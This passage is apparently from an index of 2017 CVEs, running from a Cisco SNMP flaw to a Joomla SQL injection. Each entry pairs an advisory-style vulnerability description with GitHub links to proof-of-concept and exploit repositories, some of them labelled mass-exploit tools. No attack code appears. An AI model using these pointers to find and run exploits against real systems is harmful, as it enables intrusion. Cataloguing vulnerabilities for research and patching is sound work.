The Simple Network Management Protocol (SNMP) subsystem of Cisco IOS 12.0 through 12.4 and 15.0 through 15.6 and IOS XE 2.2 through 3.17 contains multiple vulnerabilities that could allow an authenticated, remote attacker to remotely execute code on an affected system or cause an affected system to reload. An attacker could exploit these vulnerabilities by sending a crafted SNMP packet to an affected system via IPv4 or IPv6. Only traffic directed to an affected system can be used to exploit these vulnerabilities. The vulnerabilities are due to a buffer overflow condition in the SNMP subsystem of the affected software. The vulnerabilities affect all versions of SNMP: Versions 1, 2c, and 3. To exploit these vulnerabilities via SNMP Version 2c or earlier, the attacker must know the SNMP read-only community string for the affected system. To exploit these vulnerabilities via SNMP Version 3, the attacker must have user credentials for the affected system. All devices that have enabled SNMP and have not explicitly excluded the affected MIBs or OIDs should be considered vulnerable. Cisco Bug IDs: CSCve57697.

- [GarnetSunset/CiscoSpectreTakeover](https://github.com/GarnetSunset/CiscoSpectreTakeover)
- [GarnetSunset/CiscoIOSSNMPToolkit](https://github.com/GarnetSunset/CiscoIOSSNMPToolkit)

### CVE-2017-6913 (2018-09-18)

Cross-site scripting (XSS) vulnerability in the Open-Xchange webmail before 7.6.3-rev28 allows remote attackers to inject arbitrary web script or HTML via the event attribute in a time tag.

- [gquere/CVE-2017-6913](https://github.com/gquere/CVE-2017-6913)

### CVE-2017-6971 (2017-03-22)

AlienVault USM and OSSIM before 5.3.7 and NfSen before 1.3.8 allow remote authenticated users to execute arbitrary commands in a privileged context, or launch a reverse shell, via vectors involving the PHP session ID and the NfSen PHP code, aka AlienVault ID ENG-104862.

- [patrickfreed/nfsen-exploit](https://github.com/patrickfreed/nfsen-exploit)
- [KeyStrOke95/nfsen_1.3.7_CVE-2017-6971](https://github.com/KeyStrOke95/nfsen_1.3.7_CVE-2017-6971)

### CVE-2017-7038 (2017-07-20)

A DOMParser XSS issue was discovered in certain Apple products. iOS before 10.3.3 is affected. Safari before 10.1.2 is affected. tvOS before 10.2.2 is affected. The issue involves the "WebKit" component.

- [ansjdnakjdnajkd/CVE-2017-7038](https://github.com/ansjdnakjdnajkd/CVE-2017-7038)

### CVE-2017-7047 (2017-07-20)

An issue was discovered in certain Apple products. iOS before 10.3.3 is affected. macOS before 10.12.6 is affected. tvOS before 10.2.2 is affected. watchOS before 3.2.3 is affected. The issue involves the "libxpc" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.

- [JosephShenton/Triple_Fetch-Kernel-Creds](https://github.com/JosephShenton/Triple_Fetch-Kernel-Creds)
- [q1f3/Triple_fetch](https://github.com/q1f3/Triple_fetch)

### CVE-2017-7089 (2017-10-23)

An issue was discovered in certain Apple products. iOS before 11 is affected. Safari before 11 is affected. iCloud before 7.0 on Windows is affected. The issue involves the "WebKit" component. It allows remote attackers to conduct Universal XSS (UXSS) attacks via a crafted web site that is mishandled during parent-tab processing.

- [Bo0oM/CVE-2017-7089](https://github.com/Bo0oM/CVE-2017-7089)
- [aymankhalfatni/Safari_Mac](https://github.com/aymankhalfatni/Safari_Mac)

### CVE-2017-7092 (2017-10-23)

An issue was discovered in certain Apple products. iOS before 11 is affected. Safari before 11 is affected. iCloud before 7.0 on Windows is affected. iTunes before 12.7 on Windows is affected. tvOS before 11 is affected. The issue involves the "WebKit" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.

- [xuechiyaobai/CVE-2017-7092-PoC](https://github.com/xuechiyaobai/CVE-2017-7092-PoC)

### CVE-2017-7173 (2018-04-03)

An issue was discovered in certain Apple products. macOS before 10.13.2 is affected. The issue involves the "Kernel" component. It allows attackers to bypass intended memory-read restrictions via a crafted app.

- [bazad/sysctl_coalition_get_pid_list-dos](https://github.com/bazad/sysctl_coalition_get_pid_list-dos)

### CVE-2017-7184 (2017-03-19)

The xfrm_replay_verify_len function in net/xfrm/xfrm_user.c in the Linux kernel through 4.10.6 does not validate certain size data after an XFRM_MSG_NEWAE update, which allows local users to obtain root privileges or cause a denial of service (heap-based out-of-bounds access) by leveraging the CAP_NET_ADMIN capability, as demonstrated during a Pwn2Own competition at CanSecWest 2017 for the Ubuntu 16.10 linux-image-* package 4.8.0.41.52.

- [rockl/cve-2017-7184](https://github.com/rockl/cve-2017-7184)
- [rockl/cve-2017-7184-bak](https://github.com/rockl/cve-2017-7184-bak)

### CVE-2017-7188 (2017-04-14)

Zurmo 3.1.1 Stable allows a Cross-Site Scripting (XSS) attack with a base64-encoded SCRIPT element within a data: URL in the returnUrl parameter to default/toggleCollapse.

- [faizzaidi/Zurmo-Stable-3.1.1-XSS-By-Provensec-LLC](https://github.com/faizzaidi/Zurmo-Stable-3.1.1-XSS-By-Provensec-LLC)

### CVE-2017-7269 (2017-03-27)

Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning with "If: <http://" in a PROPFIND request, as exploited in the wild in July or August 2016.

- [eliuha/webdav_exploit](https://github.com/eliuha/webdav_exploit)
- [lcatro/CVE-2017-7269-Echo-PoC](https://github.com/lcatro/CVE-2017-7269-Echo-PoC)
- [caicai1355/CVE-2017-7269-exploit](https://github.com/caicai1355/CVE-2017-7269-exploit)
- [M1a0rz/CVE-2017-7269](https://github.com/M1a0rz/CVE-2017-7269)
- [whiteHat001/cve-2017-7269picture](https://github.com/whiteHat001/cve-2017-7269picture)
- [zcgonvh/cve-2017-7269](https://github.com/zcgonvh/cve-2017-7269)
- [g0rx/iis6-exploit-2017-CVE-2017-7269](https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269)
- [slimpagey/IIS_6.0_WebDAV_Ruby](https://github.com/slimpagey/IIS_6.0_WebDAV_Ruby)
- [homjxi0e/cve-2017-7269](https://github.com/homjxi0e/cve-2017-7269)
- [xiaovpn/CVE-2017-7269](https://github.com/xiaovpn/CVE-2017-7269)
- [zcgonvh/cve-2017-7269-tool](https://github.com/zcgonvh/cve-2017-7269-tool)
- [mirrorblack/CVE-2017-7269](https://github.com/mirrorblack/CVE-2017-7269)
- [Al1ex/CVE-2017-7269](https://github.com/Al1ex/CVE-2017-7269)
- [ThanHuuTuan/CVE-2017-7269](https://github.com/ThanHuuTuan/CVE-2017-7269)
- [h3xcr4ck3r/CVE-2017-7269](https://github.com/h3xcr4ck3r/CVE-2017-7269)
- [denchief1/CVE-2017-7269_Python3](https://github.com/denchief1/CVE-2017-7269_Python3)
- [denchief1/CVE-2017-7269](https://github.com/denchief1/CVE-2017-7269)
- [Cappricio-Securities/CVE-2017-7269](https://github.com/Cappricio-Securities/CVE-2017-7269)
- [VanishedPeople/CVE-2017-7269](https://github.com/VanishedPeople/CVE-2017-7269)
- [geniuszlyy/CVE-2017-7269](https://github.com/geniuszlyy/CVE-2017-7269)
- [AxthonyV/CVE-2017-7269](https://github.com/AxthonyV/CVE-2017-7269)

### CVE-2017-7308 (2017-03-29)

The packet_set_ring function in net/packet/af_packet.c in the Linux kernel through 4.10.6 does not properly validate certain block-size data, which allows local users to cause a denial of service (integer signedness error and out-of-bounds write), or gain privileges (if the CAP_NET_RAW capability is held), via crafted system calls.

- [anldori/CVE-2017-7308](https://github.com/anldori/CVE-2017-7308)

### CVE-2017-7358 (2017-04-05)

In LightDM through 1.22.0, a directory traversal issue in debian/guest-account.sh allows local attackers to own arbitrary directory path locations and escalate privileges to root when the guest user logs out.

- [JonPichel/CVE-2017-7358](https://github.com/JonPichel/CVE-2017-7358)

### CVE-2017-7374 (2017-03-31)

Use-after-free vulnerability in fs/crypto/ in the Linux kernel before 4.10.7 allows local users to cause a denial of service (NULL pointer dereference) or possibly gain privileges by revoking keyring keys being used for ext4, f2fs, or ubifs encryption, causing cryptographic transform objects to be freed prematurely.

- [ww9210/cve-2017-7374](https://github.com/ww9210/cve-2017-7374)

### CVE-2017-7376 (2018-02-19)

Buffer overflow in libxml2 allows remote attackers to execute arbitrary code by leveraging an incorrect limit for port values when handling redirects.

- [brahmstaedt/libxml2-exploit](https://github.com/brahmstaedt/libxml2-exploit)

### CVE-2017-7410 (2017-04-03)

Multiple SQL injection vulnerabilities in account/signup.php and account/signup2.php in WebsiteBaker 2.10.0 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) username or (2) display_name parameter.

- [ashangp923/CVE-2017-7410](https://github.com/ashangp923/CVE-2017-7410)

### CVE-2017-7472 (2017-05-11)

The KEYS subsystem in the Linux kernel before 4.10.13 allows local users to cause a denial of service (memory consumption) via a series of KEY_REQKEY_DEFL_THREAD_KEYRING keyctl_set_reqkey_keyring calls.

- [homjxi0e/CVE-2017-7472](https://github.com/homjxi0e/CVE-2017-7472)

### CVE-2017-7494 (2017-05-30)

Samba since version 3.5.0 and before 4.6.4, 4.5.10 and 4.4.14 has a remote code execution vulnerability that allows a malicious client to upload a shared library to a writable share and then cause the server to load and execute it.

- [betab0t/cve-2017-7494](https://github.com/betab0t/cve-2017-7494)
- [homjxi0e/CVE-2017-7494](https://github.com/homjxi0e/CVE-2017-7494)
- [opsxcq/exploit-CVE-2017-7494](https://github.com/opsxcq/exploit-CVE-2017-7494)
- [Waffles-2/SambaCry](https://github.com/Waffles-2/SambaCry)
- [brianwrf/SambaHunter](https://github.com/brianwrf/SambaHunter)
- [joxeankoret/CVE-2017-7494](https://github.com/joxeankoret/CVE-2017-7494)
- [Zer0d0y/Samba-CVE-2017-7494](https://github.com/Zer0d0y/Samba-CVE-2017-7494)
- [incredible1yu/CVE-2017-7494](https://github.com/incredible1yu/CVE-2017-7494)
- [cved-sources/cve-2017-7494](https://github.com/cved-sources/cve-2017-7494)
- [john-80/cve-2017-7494](https://github.com/john-80/cve-2017-7494)
- [Hansindu-M/CVE-2017-7494_IT19115344](https://github.com/Hansindu-M/CVE-2017-7494_IT19115344)
- [0xm4ud/noSAMBAnoCRY-CVE-2017-7494](https://github.com/0xm4ud/noSAMBAnoCRY-CVE-2017-7494)
- [I-Rinka/BIT-EternalBlue-for-macOS_Linux](https://github.com/I-Rinka/BIT-EternalBlue-for-macOS_Linux)
- [adjaliya/-CVE-2017-7494-Samba-Exploit-POC](https://github.com/adjaliya/-CVE-2017-7494-Samba-Exploit-POC)
- [00mjk/exploit-CVE-2017-7494](https://github.com/00mjk/exploit-CVE-2017-7494)
- [d3fudd/CVE-2017-7494_SambaCry](https://github.com/d3fudd/CVE-2017-7494_SambaCry)

### CVE-2017-7525 (2018-02-06)

A deserialization flaw was discovered in jackson-databind, versions before 2.6.7.1, 2.7.9.1 and 2.8.9, which could allow an unauthenticated user to perform code execution by sending maliciously crafted input to the readValue method of the ObjectMapper.

- [SecureSkyTechnology/study-struts2-s2-054_055-jackson-cve-2017-7525_cve-2017-15095](https://github.com/SecureSkyTechnology/study-struts2-s2-054_055-jackson-cve-2017-7525_cve-2017-15095)
- [Nazicc/S2-055](https://github.com/Nazicc/S2-055)
- [JavanXD/Demo-Exploit-Jackson-RCE](https://github.com/JavanXD/Demo-Exploit-Jackson-RCE)
- [BassinD/jackson-RCE](https://github.com/BassinD/jackson-RCE)
- [Dannners/jackson-deserialization-2017-7525](https://github.com/Dannners/jackson-deserialization-2017-7525)
- [Ingenuity-Fainting-Goats/CVE-2017-7525-Jackson-Deserialization-Lab](https://github.com/Ingenuity-Fainting-Goats/CVE-2017-7525-Jackson-Deserialization-Lab)

### CVE-2017-7529 (2017-07-13)

Nginx versions since 0.5.6 up to and including 1.13.2 are vulnerable to an integer overflow vulnerability in the nginx range filter module, resulting in a leak of potentially sensitive information triggered by a specially crafted request.

- [liusec/CVE-2017-7529](https://github.com/liusec/CVE-2017-7529)
- [en0f/CVE-2017-7529_PoC](https://github.com/en0f/CVE-2017-7529_PoC)
- [cved-sources/cve-2017-7529](https://github.com/cved-sources/cve-2017-7529)
- [MaxSecurity/CVE-2017-7529-POC](https://github.com/MaxSecurity/CVE-2017-7529-POC)
- [cyberk1w1/CVE-2017-7529](https://github.com/cyberk1w1/CVE-2017-7529)
- [cyberharsh/nginx-CVE-2017-7529](https://github.com/cyberharsh/nginx-CVE-2017-7529)
- [daehee/nginx-overflow](https://github.com/daehee/nginx-overflow)
- [gemboxteam/exploit-nginx-1.10.3](https://github.com/gemboxteam/exploit-nginx-1.10.3)
- [fardeen-ahmed/Remote-Integer-Overflow-Vulnerability](https://github.com/fardeen-ahmed/Remote-Integer-Overflow-Vulnerability)
- [mo3zj/Nginx-Remote-Integer-Overflow-Vulnerability](https://github.com/mo3zj/Nginx-Remote-Integer-Overflow-Vulnerability)
- [fu2x2000/CVE-2017-7529-Nginx---Remote-Integer-Overflow-Exploit](https://github.com/fu2x2000/CVE-2017-7529-Nginx---Remote-Integer-Overflow-Exploit)
- [Shehzadcyber/CVE-2017-7529](https://github.com/Shehzadcyber/CVE-2017-7529)
- [coolman6942o/-Exploit-CVE-2017-7529](https://github.com/coolman6942o/-Exploit-CVE-2017-7529)
- [SirEagIe/CVE-2017-7529](https://github.com/SirEagIe/CVE-2017-7529)

### CVE-2017-7648 (2017-04-10)

Foscam networked devices use the same hardcoded SSL private key across different customers' installations, which allows remote attackers to defeat cryptographic protection mechanisms by leveraging knowledge of this key from another installation.

- [notmot/CVE-2017-7648.](https://github.com/notmot/CVE-2017-7648.)

### CVE-2017-7651 (2018-04-24)

In Eclipse Mosquitto 1.4.14, a user can shut down the Mosquitto server simply by filling RAM with a large number of connections carrying large payloads. This can be done without authentication if it occurs in the connection phase of the MQTT protocol.

- [mukkul007/MqttAttack](https://github.com/mukkul007/MqttAttack)
- [St3v3nsS/CVE-2017-7651](https://github.com/St3v3nsS/CVE-2017-7651)

### CVE-2017-7679 (2017-06-20)

In Apache httpd 2.2.x before 2.2.33 and 2.4.x before 2.4.26, mod_mime can read one byte past the end of a buffer when sending a malicious Content-Type response header.

- [snknritr/CVE-2017-7679-in-python](https://github.com/snknritr/CVE-2017-7679-in-python)

### CVE-2017-7912 (2019-04-08)

In Hanwha Techwin SRN-4000 firmware versions prior to SRN4000_v2.16_170401, a specially crafted HTTP request and response could allow an attacker to gain access to the device management page with admin privileges without proper authentication.

- [homjxi0e/CVE-2017-7912_Sneak](https://github.com/homjxi0e/CVE-2017-7912_Sneak)

### CVE-2017-7921 (2017-05-06)

An Improper Authentication issue was discovered in Hikvision DS-2CD2xx2F-I Series V5.2.0 build 140721 to V5.4.0 build 160530, DS-2CD2xx0F-I Series V5.2.0 build 140721 to V5.4.0 Build 160401, DS-2CD2xx2FWD Series V5.3.1 build 150410 to V5.4.4 Build 161125, DS-2CD4x2xFWD Series V5.2.0 build 140721 to V5.4.0 Build 160414, DS-2CD4xx5 Series V5.2.0 build 140721 to V5.4.0 Build 160421, DS-2DFx Series V5.2.0 build 140805 to V5.4.5 Build 160928, and DS-2CD63xx Series V5.0.9 build 140305 to V5.3.5 Build 160106 devices. The improper authentication vulnerability occurs when an application does not adequately or correctly authenticate users. This may allow a malicious user to escalate his or her privileges on the system and gain access to sensitive information.

- [JrDw0/CVE-2017-7921-EXP](https://github.com/JrDw0/CVE-2017-7921-EXP)
- [BurnyMcDull/CVE-2017-7921](https://github.com/BurnyMcDull/CVE-2017-7921)
- [MisakaMikato/cve-2017-7921-golang](https://github.com/MisakaMikato/cve-2017-7921-golang)
- [chrisjd20/hikvision_CVE-2017-7921_auth_bypass_config_decryptor](https://github.com/chrisjd20/hikvision_CVE-2017-7921_auth_bypass_config_decryptor)
- [p4tq/hikvision_CVE-2017-7921_auth_bypass_config_decryptor](https://github.com/p4tq/hikvision_CVE-2017-7921_auth_bypass_config_decryptor)
- [201646613/CVE-2017-7921](https://github.com/201646613/CVE-2017-7921)
- [inj3ction/CVE-2017-7921-EXP](https://github.com/inj3ction/CVE-2017-7921-EXP)
- [krypton612/hikivision](https://github.com/krypton612/hikivision)
- [K3ysTr0K3R/CVE-2017-7921-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2017-7921-EXPLOIT)
- [fracergu/CVE-2017-7921](https://github.com/fracergu/CVE-2017-7921)
- [AnonkiGroup/AnonHik](https://github.com/AnonkiGroup/AnonHik)
- [b3pwn3d/CVE-2017-7921](https://github.com/b3pwn3d/CVE-2017-7921)
- [yousouf-Tasfin/cve-2017-7921-Mass-Exploit](https://github.com/yousouf-Tasfin/cve-2017-7921-Mass-Exploit)
- [kooroshsanaei/HikVision-CVE-2017-7921](https://github.com/kooroshsanaei/HikVision-CVE-2017-7921)

### CVE-2017-7998 (2018-01-08)

Multiple cross-site scripting (XSS) vulnerabilities in Gespage before 7.4.9 allow remote attackers to inject arbitrary web script or HTML via the (1) printer name when adding a printer in the admin panel or (2) username parameter to webapp/users/user_reg.jsp.

- [homjxi0e/CVE-2017-7998](https://github.com/homjxi0e/CVE-2017-7998)

### CVE-2017-8046 (2018-01-04)

Malicious PATCH requests submitted to servers using Spring Data REST versions prior to 2.6.9 (Ingalls SR9), versions prior to 3.0.1 (Kay SR1) and Spring Boot versions prior to 1.5.9, 2.0 M6 can use specially crafted JSON data to run arbitrary Java code.

- [Soontao/CVE-2017-8046-DEMO](https://github.com/Soontao/CVE-2017-8046-DEMO)
- [sj/spring-data-rest-CVE-2017-8046](https://github.com/sj/spring-data-rest-CVE-2017-8046)
- [m3ssap0/SpringBreakVulnerableApp](https://github.com/m3ssap0/SpringBreakVulnerableApp)
- [m3ssap0/spring-break_cve-2017-8046](https://github.com/m3ssap0/spring-break_cve-2017-8046)
- [FixYourFace/SpringBreakPoC](https://github.com/FixYourFace/SpringBreakPoC)
- [jkutner/spring-break-cve-2017-8046](https://github.com/jkutner/spring-break-cve-2017-8046)
- [bkhablenko/CVE-2017-8046](https://github.com/bkhablenko/CVE-2017-8046)
- [cved-sources/cve-2017-8046](https://github.com/cved-sources/cve-2017-8046)
- [jsotiro/VulnerableSpringDataRest](https://github.com/jsotiro/VulnerableSpringDataRest)
- [guanjivip/CVE-2017-8046](https://github.com/guanjivip/CVE-2017-8046)

### CVE-2017-8225 (2017-04-25)

On Wireless IP Camera (P2P) WIFICAM devices, access to .ini files (containing credentials) is not correctly checked. An attacker can bypass authentication by providing an empty loginuse parameter and an empty loginpas parameter in the URI.

- [kienquoc102/CVE-2017-8225](https://github.com/kienquoc102/CVE-2017-8225)
- [K3ysTr0K3R/CVE-2017-8225-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2017-8225-EXPLOIT)

### CVE-2017-8295 (2017-05-04)

WordPress through 4.7.4 relies on the Host HTTP header for a password-reset e-mail message, which makes it easier for remote attackers to reset arbitrary passwords by making a crafted wp-login.php?action=lostpassword request and then arranging for this message to bounce or be resent, leading to transmission of the reset key to a mailbox on an attacker-controlled SMTP server. This is related to problematic use of the SERVER_NAME variable in wp-includes/pluggable.php in conjunction with the PHP mail function. Exploitation is not achievable in all cases because it requires at least one of the following: (1) the attacker can prevent the victim from receiving any e-mail messages for an extended period of time (such as 5 days), (2) the victim's e-mail system sends an autoresponse containing the original message, or (3) the victim manually composes a reply containing the original message.

- [homjxi0e/CVE-2017-8295-WordPress-4.7.4---Unauthorized-Password-Reset](https://github.com/homjxi0e/CVE-2017-8295-WordPress-4.7.4---Unauthorized-Password-Reset)
- [alash3al/wp-allowed-hosts](https://github.com/alash3al/wp-allowed-hosts)
- [cyberheartmi9/CVE-2017-8295](https://github.com/cyberheartmi9/CVE-2017-8295)

### CVE-2017-8367 (2017-04-30)

Buffer overflow in Ether Software Easy MOV Converter 1.4.24, Easy DVD Creator, Easy MPEG/AVI/DIVX/WMV/RM to DVD, Easy Avi/Divx/Xvid to DVD Burner, Easy MPEG to DVD Burner, Easy WMV/ASF/ASX to DVD Burner, Easy RM RMVB to DVD Burner, Easy CD DVD Copy, MP3/AVI/MPEG/WMV/RM to Audio CD Burner, MP3/WAV/OGG/WMA/AC3 to CD Burner, MP3 WAV to CD Burner, My Video Converter, Easy AVI DivX Converter, Easy Video to iPod Converter, Easy Video to PSP Converter, Easy Video to 3GP Converter, Easy Video to MP4 Converter, and Easy Video to iPod/MP4/PSP/3GP Converter allows local attackers to cause a denial of service (SEH overwrite) or possibly have unspecified other impact via a long username.

- [rnnsz/CVE-2017-8367](https://github.com/rnnsz/CVE-2017-8367)

### CVE-2017-8382 (2017-05-16)

admidio 3.2.8 has CSRF in adm_program/modules/members/members_function.php with an impact of deleting arbitrary user accounts.

- [faizzaidi/Admidio-3.2.8-CSRF-POC-by-Provensec-llc](https://github.com/faizzaidi/Admidio-3.2.8-CSRF-POC-by-Provensec-llc)

### CVE-2017-8464 (2017-06-15)

Windows Shell in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allows local users or remote attackers to execute arbitrary code via a crafted .LNK file, which is not properly handled during icon display in Windows Explorer or any other application that parses the icon of the shortcut. aka "LNK Remote Code Execution Vulnerability."

- [Elm0D/CVE-2017-8464](https://github.com/Elm0D/CVE-2017-8464)
- [3gstudent/CVE-2017-8464-EXP](https://github.com/3gstudent/CVE-2017-8464-EXP)
- [doudouhala/CVE-2017-8464-exp-generator](https://github.com/doudouhala/CVE-2017-8464-exp-generator)
- [X-Vector/usbhijacking](https://github.com/X-Vector/usbhijacking)
- [xssfile/CVE-2017-8464-EXP](https://github.com/xssfile/CVE-2017-8464-EXP)
- [TrG-1999/DetectPacket-CVE-2017-8464](https://github.com/TrG-1999/DetectPacket-CVE-2017-8464)
- [tuankiethkt020/Phat-hien-CVE-2017-8464](https://github.com/tuankiethkt020/Phat-hien-CVE-2017-8464)
- [TieuLong21Prosper/Detect-CVE-2017-8464](https://github.com/TieuLong21Prosper/Detect-CVE-2017-8464)

### CVE-2017-8465 (2017-06-15)

Microsoft Windows 8.1 and Windows RT 8.1, Windows Server 2012 R2, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 allow an attacker to run processes in an elevated context when the Windows kernel improperly handles objects in memory, aka "Win32k Elevation of Privilege Vulnerability." This CVE ID is unique from CVE-2017-8468.

- [nghiadt1098/CVE-2017-8465](https://github.com/nghiadt1098/CVE-2017-8465)

### CVE-2017-8529 (2017-06-15)

Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8.1 and Windows RT 8.1, and Windows Server 2012 and R2 allow an attacker to detect specific files on the user's computer when affected Microsoft scripting engines do not properly handle objects in memory, aka "Microsoft Browser Information Disclosure Vulnerability".

- [sfitpro/cve-2017-8529](https://github.com/sfitpro/cve-2017-8529)
- [kaddirov/windows2016fixCVE-2017-8529](https://github.com/kaddirov/windows2016fixCVE-2017-8529)

### CVE-2017-8543 (2017-06-15)

Microsoft Windows XP SP3, Windows XP x64 XP2, Windows Server 2003 SP2, Windows Vista, Windows 7 SP1, Windows Server 2008 SP2 and R2 SP1, Windows 8, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 allow an attacker to take control of the affected system when Windows Search fails to handle objects in memory, aka "Windows Search Remote Code Execution Vulnerability".

- [americanhanko/windows-security-cve-2017-8543](https://github.com/americanhanko/windows-security-cve-2017-8543)

### CVE-2017-8570 (2017-07-11)

Microsoft Office allows a remote code execution vulnerability due to the way that it handles objects in memory, aka "Microsoft Office Remote Code Execution Vulnerability". This CVE ID is unique from CVE-2017-0243.

- [temesgeny/ppsx-file-generator](https://github.com/temesgeny/ppsx-file-generator)
- [rxwx/CVE-2017-8570](https://github.com/rxwx/CVE-2017-8570)
- [MaxSecurity/Office-CVE-2017-8570](https://github.com/MaxSecurity/Office-CVE-2017-8570)
- [SwordSheath/CVE-2017-8570](https://github.com/SwordSheath/CVE-2017-8570)
- [Drac0nids/CVE-2017-8570](https://github.com/Drac0nids/CVE-2017-8570)
- [sasqwatch/CVE-2017-8570](https://github.com/sasqwatch/CVE-2017-8570)
- [erfze/CVE-2017-8570](https://github.com/erfze/CVE-2017-8570)

### CVE-2017-8625 (2017-08-08)

Internet Explorer in Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allows an attacker to bypass Device Guard User Mode Code Integrity (UMCI) policies due to Internet Explorer failing to validate UMCI policies, aka "Internet Explorer Security Feature Bypass Vulnerability".

- [homjxi0e/CVE-2017-8625_Bypass_UMCI](https://github.com/homjxi0e/CVE-2017-8625_Bypass_UMCI)

### CVE-2017-8641 (2017-08-08)

Microsoft browsers in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allow an attacker to execute arbitrary code in the context of the current user due to the way that Microsoft browser JavaScript engines render when handling objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-8634, CVE-2017-8635, CVE-2017-8636, CVE-2017-8638, CVE-2017-8639, CVE-2017-8640, CVE-2017-8645, CVE-2017-8646, CVE-2017-8647, CVE-2017-8655, CVE-2017-8656, CVE-2017-8657, CVE-2017-8670, CVE-2017-8671, CVE-2017-8672, and CVE-2017-8674.

- [homjxi0e/CVE-2017-8641_chakra_Js_GlobalObject](https://github.com/homjxi0e/CVE-2017-8641_chakra_Js_GlobalObject)

### CVE-2017-8759 (2017-09-13)

Microsoft .NET Framework 2.0, 3.5, 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2 and 4.7 allow an attacker to execute code remotely via a malicious document or application, aka ".NET Framework Remote Code Execution Vulnerability."

- [Voulnet/CVE-2017-8759-Exploit-sample](https://github.com/Voulnet/CVE-2017-8759-Exploit-sample)
- [nccgroup/CVE-2017-8759](https://github.com/nccgroup/CVE-2017-8759)
- [vysecurity/CVE-2017-8759](https://github.com/vysecurity/CVE-2017-8759)
- [BasuCert/CVE-2017-8759](https://github.com/BasuCert/CVE-2017-8759)
- [tahisaad6/CVE-2017-8759-Exploit-sample2](https://github.com/tahisaad6/CVE-2017-8759-Exploit-sample2)
- [homjxi0e/CVE-2017-8759_-SOAP_WSDL](https://github.com/homjxi0e/CVE-2017-8759_-SOAP_WSDL)
- [bhdresh/CVE-2017-8759](https://github.com/bhdresh/CVE-2017-8759)
- [JonasUliana/CVE-2017-8759](https://github.com/JonasUliana/CVE-2017-8759)
- [sythass/CVE-2017-8759](https://github.com/sythass/CVE-2017-8759)
- [ashr/CVE-2017-8759-exploits](https://github.com/ashr/CVE-2017-8759-exploits)
- [l0n3rs/CVE-2017-8759](https://github.com/l0n3rs/CVE-2017-8759)
- [ChaitanyaHaritash/CVE-2017-8759](https://github.com/ChaitanyaHaritash/CVE-2017-8759)
- [smashinu/CVE-2017-8759Expoit](https://github.com/smashinu/CVE-2017-8759Expoit)
- [adeljck/CVE-2017-8759](https://github.com/adeljck/CVE-2017-8759)
- [zhengkook/CVE-2017-8759](https://github.com/zhengkook/CVE-2017-8759)
- [varunsaru/SNP](https://github.com/varunsaru/SNP)
- [GayashanM/OHTS](https://github.com/GayashanM/OHTS)

### CVE-2017-8760 (2017-05-05)

An issue was discovered on Accellion FTA devices before FTA_9_12_180. There is XSS in courier/1000@/index.html with the auth_params parameter. The device tries to use internal WAF filters to stop specific XSS Vulnerabilities. However, these can be bypassed by using some modifications to the payloads, e.g., URL encoding.

- [Voraka/cve-2017-8760](https://github.com/Voraka/cve-2017-8760)

### CVE-2017-8779 (2017-05-04)

rpcbind through 0.2.4, LIBTIRPC through 1.0.1 and 1.0.2-rc through 1.0.2-rc3, and NTIRPC through 1.4.3 do not consider the maximum RPC data size during memory allocation for XDR strings, which allows remote attackers to cause a denial of service (memory consumption with no subsequent free) via a crafted UDP packet to port 111, aka rpcbomb.

- [drbothen/GO-RPCBOMB](https://github.com/drbothen/GO-RPCBOMB)

### CVE-2017-8802 (2018-01-16)

Cross-site scripting (XSS) vulnerability in Zimbra Collaboration Suite (aka ZCS) before 8.8.0 Beta2 might allow remote attackers to inject arbitrary web script or HTML via vectors related to the "Show Snippet" functionality.

- [ozzi-/Zimbra-CVE-2017-8802-Hotifx](https://github.com/ozzi-/Zimbra-CVE-2017-8802-Hotifx)

### CVE-2017-8809 (2017-11-15)

api.php in MediaWiki before 1.27.4, 1.28.x before 1.28.3, and 1.29.x before 1.29.2 has a Reflected File Download vulnerability.

- [motikan2010/CVE-2017-8809_MediaWiki_RFD](https://github.com/motikan2010/CVE-2017-8809_MediaWiki_RFD)

### CVE-2017-8890 (2017-05-10)

The inet_csk_clone_lock function in net/ipv4/inet_connection_sock.c in the Linux kernel through 4.10.15 allows attackers to cause a denial of service (double free) or possibly have unspecified other impact by leveraging use of the accept system call.

- [beraphin/CVE-2017-8890](https://github.com/beraphin/CVE-2017-8890)
- [thinkycx/CVE-2017-8890](https://github.com/thinkycx/CVE-2017-8890)
- [7043mcgeep/cve-2017-8890-msf](https://github.com/7043mcgeep/cve-2017-8890-msf)

### CVE-2017-8917 (2017-05-17)

SQL injection vulnerability in Joomla! 3.7.x before 3.7.1 allows attackers to execute arbitrary SQL commands via unspecified vectors.

- [brianwrf/Joomla3.7-SQLi-CVE-2017-8917](https://github.com/brianwrf/Joomla3.7-SQLi-CVE-2017-8917)
- [stefanlucas/Exploit-Joomla](https://github.com/stefanlucas/Exploit-Joomla)
- [cved-sources/cve-2017-8917](https://github.com/cved-sources/cve-2017-8917)
- [gmohlamo/CVE-2017-8917](https://github.com/gmohlamo/CVE-2017-8917)
- [AkuCyberSec/CVE-2017-8917-Joomla-370-SQL-Injection](https://github.com/AkuCyberSec/CVE-2017-8917-Joomla-370-SQL-Injection)
- [Siopy/CVE-2017-8917](https://github.com/Siopy/CVE-2017-8917)
- [ionutbaltariu/joomla_CVE-2017-8917](https://github.com/ionutbaltariu/joomla_CVE-2017-8917)
